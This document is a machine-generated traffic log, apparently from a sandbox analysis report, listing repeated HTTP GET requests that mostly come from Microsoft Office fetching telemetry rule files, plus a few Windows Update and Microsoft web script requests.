          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=r+aWDcu63agkNoh&MD=V16GSvzv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
